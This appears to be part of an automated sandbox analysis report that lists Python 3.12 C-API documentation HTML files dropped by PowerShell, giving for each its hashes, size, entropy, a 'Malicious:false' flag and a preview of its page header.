                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Number Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/number.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Number Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="..

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\objbuffer.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1198), with CRLF line terminators
                              Category:dropped
                              Size (bytes):22448
                              Entropy (8bit):4.887100931867726
                              Encrypted:false
                              SSDEEP:
                              MD5:C673B4DE41142E7D613D46C1BA601298
                              SHA1:B889C5A288541C989F1C4826C5087BDB135763D2
                              SHA-256:97CF60328DA673BF415E58E6992CF9A51887333EEB014017FCABC8FCEA6272ED
                              SHA-512:7E1B864AFC10B4D9843ACBC43D3BB63DDC522407A65A1D2C0E769284CBC14617CE7CA9C7295CBE96DD9527AD8DFFD2C691CA671700CE0194C25A45F643D9ECF9
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Old Buffer Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/objbuffer.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions were part of the .old buffer protocol. API in Python 2. In Python 3, this protocol doesn.t exist anymore but the functions are still exposed to ease porting 2.x code. They act as a ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions were part of the .old buffer protocol

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\object.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1154), with CRLF line terminators
                              Category:dropped
                              Size (bytes):97068
                              Entropy (8bit):4.82427893690913
                              Encrypted:false
                              SSDEEP:
                              MD5:41E5F97493467FF20C47A63598EA5275
                              SHA1:1E93BF9C4A86958FFF106C5A69B4B1F9718B89C5
                              SHA-256:885BFF9F047F1C62A4ECBD748485149AF7C732A0D9C415AE3C7500783D719C87
                              SHA-512:BBA88DB58A6B783018A8338DD37AEA8B4321BEA9A36D4743AC2713F9863FF5AF50C7AF3CC866089CDDC33700678A472556193E411D49A3C1D67F48339803BE19
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Object Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/object.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Object Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="..

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\objimpl.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):16752
                              Entropy (8bit):4.87449704964025
                              Encrypted:false
                              SSDEEP:
                              MD5:F320520FDA975A75D63F07C76CC1BEB5
                              SHA1:3A988D6AC5F1042661E8789C7633B21313B8875F
                              SHA-256:A7E9A61705984E694631DA4C100E17FDBFFA1CFF45309E3B4A9E5E192F404279
                              SHA-512:8A5F8B56479768D4564530FDC60E2D0DEFEA6D6369827A58FC1F04E39EA28962E21431276B03190D27190531C4D588F0C98DDE9247D4DEE23547A60C2FC5CBE6
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Object Implementation Support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/objimpl.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter describes the functions, types, and macros used when defining new object types. Allocating Objects on the Heap, Common Object Structures- Base object types and macros, Implementing fun..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter describes the functions, types, and macr

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\perfmaps.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1103), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20192
                              Entropy (8bit):4.876514973239937
                              Encrypted:false
                              SSDEEP:
                              MD5:892CDF2046EF215A1FAC2673C4FB0A30
                              SHA1:0EC0487BE38A111753FE76B5120C129CFD25170A
                              SHA-256:EFFD231F6EB7EF78C9F845A5777835351AFA1863A8371100A62391EA7F7265E1
                              SHA-512:E3306C1A10724152CA5723FD300A44EC0B2B0F91B59222296B37D8332AAD8EA988DE29472BCE3876A9F64E649DC5446C4803843521DD23DB626E1057DEC13287
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Support for Perf Maps" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/perfmaps.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="On supported platforms (as of this writing, only Linux), the runtime can take advantage of perf map files to make Python functions visible to an external profiling tool (such as perf). A running pr..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="On supported platforms (as of this writing, only Linux), the

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\refcounting.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (820), with CRLF line terminators
                              Category:dropped
                              Size (bytes):37929
                              Entropy (8bit):4.941077785140546
                              Encrypted:false
                              SSDEEP:
                              MD5:8801BA977A599E84FC2686704210D098
                              SHA1:95D582C907A192417AF6D3E6AC44A5B55A569EF7
                              SHA-256:DC6FC615F63CC64E126FD2F503F6E6BCC2B31CF06DDF6CCD596FE913933D8E85
                              SHA-512:3441189F423C53BF78C4C1F6C6FF85886C0FE0F28FD9DFE0092E06BA35BC453CDA5DF1010367DFA64ACA805DFB8BCA3E57332602399887E79C94DEC5EDB0C580
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Reference Counting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/refcounting.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions and macros in this section are used for managing reference counts of Python objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions and macros in this section are used for managing reference counts of Python objects." />..<meta property="og:image:width" content="200" />..<meta pr

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\reflection.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (737), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19346
                              Entropy (8bit):4.8923699527530315
                              Encrypted:false
                              SSDEEP:
                              MD5:F7EF7EF6A74A0D74ABCA752FE436B98B
                              SHA1:23F6A8DDD4C889BD379FE08787BB8FE8EEB9A557
                              SHA-256:D0CBB213F455E06CAB33EC2E2C8D219FE8ACFA95BC61C48A571DB37A3073FCAC
                              SHA-512:7B7A8D429E5F81CB2B8BA6476FAFE19853B1FDA3655E1756ED6C201DE44F60C6B457CF3FABA0068F1C09234DA8371E44754149074FE66BDEED0EE0180A048FD9
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Reflection" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/reflection.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Reflection &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="../_stat

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\sequence.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1310), with CRLF line terminators
                              Category:dropped
                              Size (bytes):50587
                              Entropy (8bit):4.837412214825317
                              Encrypted:false
                              SSDEEP:
                              MD5:56B339BDF0E0710A6F053DCAA7EE3379
                              SHA1:C64E6C91A1E7E651ABB29057828D2A484CB29D3F
                              SHA-256:001178FF662655D87AD524018C5CFF292F764AF06549720D01603CCB8306BB8A
                              SHA-512:4A5CB6C98BEF458483A3B79A8BFE9ECAB885EEBD1FD2EA8A5993F282F3262A136734BE1F27637E966344FD49F966A550D6778A8BFEF249640502BFC2D9487824
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Sequence Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/sequence.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Sequence Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" hr

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\set.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (871), with CRLF line terminators
                              Category:dropped
                              Size (bytes):46531
                              Entropy (8bit):4.856628859617243
                              Encrypted:false
                              SSDEEP:
                              MD5:FE67269735076CAE68EDBC4708AA18E1
                              SHA1:CB90E3218E15928762159DD2F266BA2842ABF880
                              SHA-256:F0252DF1FD4F4EE6D464D5DBC86443775BF53B009BA68059BF322D8F5423CEC9
                              SHA-512:D05F3A1B89ABCF3C6D4054E1997D15CD14101300976BAD4FCF948E051A17C5A9ECBEDCBEBC646B793D70338931F5E618BA03E7DF341BA906637BA67DFF3EA7BC
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Set Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/set.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This section details the public API for set and frozenset objects. Any functionality not listed below is best accessed using either the abstract object protocol (including PyObject_CallMethod(), Py..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This section details the public API for set and frozenset objects. Any func

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\slice.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1921), with CRLF line terminators
                              Category:dropped
                              Size (bytes):34047
                              Entropy (8bit):4.853956486974159
                              Encrypted:false
                              SSDEEP:
                              MD5:2E0D0C93BDD2E75929C0608F86EA28B1
                              SHA1:F92ADF9637D55271BD6D1C922CCBE3A32DB4F8BA
                              SHA-256:14AF15EAFB663F5B5B410241127B2AB690013F4A170AAC66DE6AB7C16D54D581
                              SHA-512:1D9A3BC98692C3E34853DEE1495CCD0F4CDC27A6DE151BD7555094238A96247668118A4CBC321A63AAFD845EBB1C1E5762A7F5F7E5442A03231E96CC614D02F4
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Slice Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/slice.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Ellipsis Object:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Ellipsis Object:" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Slice Objects &#8212; Python 3.12.3 documentation</title><meta name="vie

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\stable.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):216651
                              Entropy (8bit):4.945773715411537
                              Encrypted:false
                              SSDEEP:
                              MD5:FAAFD331831E731EF870F66FC20E3534
                              SHA1:CC747DFC2E1E77BD9CC020153C4085AFEFE6EC22
                              SHA-256:A1ACEA40C3400101897739250C069276C5887C68003D4E4B83D0CE5C5BF8D773
                              SHA-512:6C3DCE897D7EAB4164106CD4D199E308EFF779A721F352A0957D00D82F8C030C2F4B57F551060464BFFB061C4E5A816BEC32DF9903B933E20C8DE9350758CF28
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="C API Stability" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/stable.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Unless documented otherwise, Python.s C API is covered by the Backwards Compatibility Policy, PEP 387. Most changes to it are source-compatible (typically by only adding new API). Changing existing..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Unless documented otherwise, Python.s C API is covered by the Ba

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\structures.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1496), with CRLF line terminators
                              Category:dropped
                              Size (bytes):113548
                              Entropy (8bit):4.929874763710125
                              Encrypted:false
                              SSDEEP:
                              MD5:9ABBDC5E3742403F862988733EAD2B3C
                              SHA1:3C0EBF8E7AF992DE4DB58219726EA24058C60BB3
                              SHA-256:1A63D770BB8AA39C9C2F88171C310DE718BC846011CAB7D87AFE10F6C4C6C6A2
                              SHA-512:98FFF4848287986D5A1F844FB5966A88431DCFE7B376F470E3E9C51F0EB648FFA73D0B0CEDEB159243653A868C0EB53A3442D4E8B80ECD7D6EAFD3DF9F2FB861
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Common Object Structures" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/structures.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are a large number of structures which are used in the definition of object types for Python. This section describes these structures and how they are used. Base object types and macros: All ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are a large number of structures which are used i

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\sys.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (898), with CRLF line terminators
                              Category:dropped
                              Size (bytes):79043
                              Entropy (8bit):4.8711381767546555
                              Encrypted:false
                              SSDEEP:
                              MD5:F4CCB9ED00E2D61D27F2BDD4E434E515
                              SHA1:4681BF68370555AD68AAC84487DA452CF36B3BA7
                              SHA-256:A7E54EFC78C5B315B14FDE70C6EDA1E0719B4F774A17B56E4C84073279CBC10C
                              SHA-512:BEFF0A532F1AED814EE20EDB3C7CFB1300E4D13521A08DEE7F3A5E35822225831514BE5F8FE84F5824F743CD020FAF54585026804F97254DDA74C11C7838B225
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Operating System Utilities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/sys.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="System Functions: These are utility functions that make functionality from the sys module accessible to C code. They all work with the current interpreter thread.s sys module.s dict, which is conta..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="System Functions: These are utility functions that make

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\tuple.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1180), with CRLF line terminators
                              Category:dropped
                              Size (bytes):52632
                              Entropy (8bit):4.871431107434751
                              Encrypted:false
                              SSDEEP:
                              MD5:C684B2237C0B7ADA7F050ED1B7DA16F2
                              SHA1:8295D38C76B771E690720E2D7FE5BB4146480FC8
                              SHA-256:29D23A0F8D5D705337017D034E3F2B5073B1883E8748C9093453593E6FF17DDB
                              SHA-512:3EA61BF79C678430A3E479702CCB7CC4FC1C2B21F246EAD21977DDB5B1249DA3852C6D7B147142784D47CC515075EF8F448D51DBE977A665715237C163DE12AF
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Tuple Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/tuple.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Struct Sequence Objects: Struct sequence objects are the C equivalent of namedtuple() objects, i.e. a sequence whose items can also be accessed through attributes. To create a struct sequence, you ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Struct Sequence Objects: Struct sequence objects are the C equivalent o

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\type.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1555), with CRLF line terminators
                              Category:dropped
                              Size (bytes):87609
                              Entropy (8bit):4.899854761834203
                              Encrypted:false
                              SSDEEP:
                              MD5:03E6320EAD2EDFDB2D1D8D1C435F8249
                              SHA1:3A06EF1520A569D0806F5D18308E8B887753DFD1
                              SHA-256:63299C41D318DB31A58747D432AAA0BB3D4202A1DD1AE862C62B699B82725149
                              SHA-512:D5B3F2142C051E89F986B60DC6A0A6683ED6DD78841D3B055AE468D585EC637904F34D531FAA83851E0127519DBB306B10D5AD2FCB165798DAD88D1D0261DB17
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Type Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/type.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Creating Heap-Allocated Types: The following functions and structs are used to create heap types." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Creating Heap-Allocated Types: The following functions and structs are used to create heap types." />..<meta property="og:image:width" content="200" />..<meta property="og:imag

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\typehints.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1012), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19681
                              Entropy (8bit):4.888008295385176
                              Encrypted:false
                              SSDEEP:
                              MD5:96DA513204CD642D3BF574532FFEEF2C
                              SHA1:E5D882FC0A4537060A0AC8F0D4C5081765593F37
                              SHA-256:6D657B7383A490E96DAC6F05EAF5F29244F26EBAEB4FECE75590111E1BFB58AB
                              SHA-512:A045107ED428463F94A3142C8DA23DDCC639592625DB3863ACEAFC0306A42B6EA81C3CBF47500C91C6FC2DA5D2A252BA21A583FBA36BF881EEA4CC9306757453
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Objects for Type Hinting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/typehints.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Various built-in types for type hinting are provided. Currently, two types exist . Generiuseras and Union. Only Generiuseras is exposed to C." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Various built-in types for type hinting are provided. Currently, two types exist . Generiuseras and Union. Only

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\typeobj.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):450266
                              Entropy (8bit):4.8522974087846835
                              Encrypted:false
                              SSDEEP:
                              MD5:B98E16C9AED455FB6A0FBB3F815FC48D
                              SHA1:D29B1E353F93225F32FFD7D948DF0F6958532D56
                              SHA-256:D107CE6C88B068E3CE2BD45C94EA042AE714676E940464696114FE5430F22B3F
                              SHA-512:52919BF8FD93554FF0DBD731B5E47F9DB5BF69B8B88A9F980024CD803D59D8FCB71D936651C1D558AC59D46A3505502B878B04BA5AEE18661AF50194B756F66D
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Type Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/typeobj.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Perhaps one of the most important structures of the Python object system is the structure that defines a new type: the PyTypeObject structure. Type objects can be handled using any of the PyObject_..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Perhaps one of the most important structures of the Python object syst

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\unicode.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1103), with CRLF line terminators
                              Category:dropped
                              Size (bytes):246175
                              Entropy (8bit):4.845466352850264
                              Encrypted:false
                              SSDEEP:
                              MD5:421072F86D15E1CAAA6AE18984F61D5D
                              SHA1:625E1979886209883F9DA8F81C26B704A8B90A75
                              SHA-256:5D0739EBD4E5FBC5E1150F7F464ADABF3275518477CEFA4E6CD52651C03141C2
                              SHA-512:D2D075ECB275FCEA02F58E6D3D169B6749511B33038412561140E8F32A71FC4DD8A1344F765225591E5905FB4C7B3D48BCD03BE1D57F314AE6F19F46FDDDFA4F
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Unicode Objects and Codecs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/unicode.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Unicode Objects: Since the implementation of PEP 393 in Python 3.3, Unicode objects internally use a variety of representations, in order to allow handling the complete range of Unicode characters ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Unicode Objects: Since the implementation of PEP 393 in

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\utilities.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):15210
                              Entropy (8bit):4.832592879852463
                              Encrypted:false
                              SSDEEP:
                              MD5:7B50A2F62CBD22DC5C37A9F5297D4C30
                              SHA1:BA14C7B61EACB945CDD3BDA0C4C421E704D231A5
                              SHA-256:3787A4F4BEB8F2EFC0C8F838F2C530A4C1FE822B52BDB47CBB117377B1BF4A0D
                              SHA-512:CDC4023F2E9B6893A2A9C452E0C014450C3A94FD0213132A0208743E7818C16890D5E693239EC2BE9ED0568FADCA46889435AB87855BD2D84E00617FCCBA63EA
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Utilities" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/utilities.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter perform various utility tasks, ranging from helping C code be more portable across platforms, using Python modules from C, and parsing function arguments and construct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter perform various utility tasks, ranging fr

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\veryhigh.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1996), with CRLF line terminators
                              Category:dropped
                              Size (bytes):87602
                              Entropy (8bit):4.787656783462618
                              Encrypted:false
                              SSDEEP:
                              MD5:B48AE78A5C650CCEB1B2212D283E5DA0
                              SHA1:1B81E91073965B724874F19DE539CBC1CC8657D0
                              SHA-256:CE7F7E170F5ECAF6DF8F77AC02CFADF87345DF890AC8694A84484D7C1C8AF395
                              SHA-512:54B64669CFCEE2EA30392D663FBE16A6A961E87929D3033F6DC544EB417898B0D0E93E441A5A92139D7D5957716E497D527A1063C05AB8FDA53D045B0920C7A5
                              Malicious:false
                              Reputation:unknown
